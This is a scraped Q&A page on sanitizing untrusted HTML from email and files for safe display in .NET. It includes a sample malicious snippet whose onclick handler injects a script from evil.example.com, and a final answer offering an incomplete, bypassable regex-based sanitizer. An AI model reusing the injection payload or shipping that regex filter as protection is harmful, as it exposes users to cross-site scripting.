Home » Html » What can I use to sanitize received HTML while retaining basic formatting?

What can I use to sanitize received HTML while retaining basic formatting?

Posted by: admin November 30, 2017 Leave a comment


This is a common problem, I’m hoping it’s been thoroughly solved for me.

In a system I’m doing for a client, we want to accept HTML from untrusted sources (HTML-formatted email and also HTML files), sanitize it so it doesn’t have any scripting, links to external resources, and other security/etc. issues; and then display it safely while not losing the basic formatting. E.g., much as an email client would do with HTML-formatted email, but ideally without repeating the 347,821 mistakes that have been made (so far) in that arena. 🙂

The goal is to end up with something we’d feel comfortable displaying to internal users via an iframe in our own web interface, or via the WebBrowser class in a .Net Windows Forms app (which seems to be no safer, possibly less so), etc. Example below.

We recognize that some of this may well muck up the display of the text; that’s okay.

We’ll be sanitizing the HTML on receipt and storing the sanitized version (don’t worry about the storage part — SQL injection and the like — we’ve got that bit covered).

The software will need to run on Windows Server. COM DLL or .Net assembly preferred. FOSS markedly preferred, but not a deal-breaker.

What I’ve found so far:

  • The AntiSamy.Net project (but it appears to no longer be under active development, being over a year behind the main — and active — AntiSamy Java project).
  • Some code from our very own Jeff Atwood, circa three years ago (gee, I wonder what he was doing…).
  • The HTML Agility Pack (used by the AntiSamy.Net project above), which would give me a robust parser; then I could implement my own logic for walking through the resulting DOM and filtering out anything I didn’t whitelist. The agility pack looks really great, but I’d be relying on my own whitelist rather than reusing a wheel that someone’s already invented, so that’s a ding against it.
  • The Microsoft Anti-XSS library

What would you recommend for this task? One of the above? Something else?

For example, we want to remove things like:

  • script elements
  • link, img, and such elements that reach out to external resources (probably replace img with the text “[image removed]” or some such)
  • embed, object, applet, audio, video, and other tags that try to create objects
  • onclick and similar DOM0 event handler script code
  • hrefs on a elements that trigger code (even links we think are okay we may well turn into plaintext that users have to intentionally copy and paste into a browser).
  • __________ (the 722 things I haven’t thought of that are the reason I’m looking to leverage something that already exists)

So for instance, this HTML:

<!DOCTYPE html>
<link rel="stylesheet" type="text/css" href="http://evil.example.com/tracker.css">
<p onclick="(function() { var s = document.createElement('script'); s.src = 'http://evil.example.com/scriptattack.js'; document.body.appendChild(s);)();">
<strong>Hi there!</strong> Here's my nefarious tracker image:
<img src='http://evil.example.com/xparent.gif'>

would become

<!DOCTYPE html>
<strong>Hi there!</strong> Here's my nefarious tracker image:
[image removed]

(Note we removed the link and the onclick entirely, and replaced the img with a placeholder. This is just a small subset of what we figure we’ll need to strip out.)


This is an older, but still relevant question.

We are using the HtmlSanitizer .Net library, which:

Also on NuGet


I am sensing you would definately need a parser that can generate a XML/DOM source so that you can apply fiter on it to produce what you are looking for.

See if HtmlTidy or Mozilla or HtmlCleaner parsers can help. HtmlCleaner has lot of configurable options which you might also want to look at. Specifically the transform section that allows you to skip the tags you doesn’t require.


I suggest looking at http://htmlpurifier.org/. Their library is pretty complete.


I would suggest using another approach. If you control the method in which the HTML is viewed I would remove all threats by using a HTML render that doesn’t have a ECMA script engine, or any XSS capability. I see you are going to use the built-in WebBrowser object, and rightly so, you want to produce HTML that cannot be used to attack your users.

I recommend looking for a basic HTML display engine. One that cannot parse or understand any of the scripting functionality that would make you vulnerable. All the javascript would just be ignored then.

This does have another problem though. You would need to ensure that the viewer you are using isn’t susceptible to other types of attacks.


Interesting problem, i took some time facing it because there are a lot of things we want to remove from user imput, and even if i do a long list of things to be removed, latter on HTML can evolve and my list would have some holes.
Nonetheless i want users to input some simple things like bold, italic, paragraphs… prety simple.
No doubts the allowed things list is shorter and html can change latter on, that wont make holes on my list unless html stops supports this simple things.
So start thinking otherwise, say just what you allow, with great pain because i’m not an expert on regex (so please some regex people correct me here or improve) i coded this expression and its working form me even before HTML5 arrive.


(b|i|p|br) <- this is the list of allowed tags, feel free to add some.

this is a startpoint and thats why some regex people should improve to remove also the attributes, like onclick

if i do this:


tags with onclick or other stuff will be removed but the corresponding closing tags will remain, and after all we don’t want those tags removed we just want to remove the tag attributes.

maybe a second regex pass with


am i right? can this be composed into a single pass?

we still have no relation between tags (opening/closing), no great deal till now.
Can the attribute remove be write to remove all not from a white lists? (possibly yes).

a last problem.. when removing tags like script the content remains, its desirable when removing font but not script, well we can do a first pass with


that will remove certain tags and its content.. but its a black list, meaning you have to keep an eye on it in case html changes.

note: all with “gi”


joined all the above on this function

String.prototype.sanitizeHTML=function (white,black) {
   if (!white) white="b|i|p|br";//allowed tags
   if (!black) black="script|object|embed";//complete remove tags
   e=new RegExp("(<("+black+")[^>]*>.*</\2>|(?!<[/]?("+white+")(\s[^<]*>|[/]>|>))<[^<>]*>|(?!<[^<>\s]+)\s[^</>]+(?=[/>]))", "gi");
   return this.replace(e,"");

-black list -> complete remove tag and content
-white list -> retain tags
other tags are removed but tag content is retained
all attributes of white list tag’s (the remaining ones) are removed

still there is place for a white list of attributes (not implemented above) because if i want to preserve IMG then the src must stay… and what about tracking images?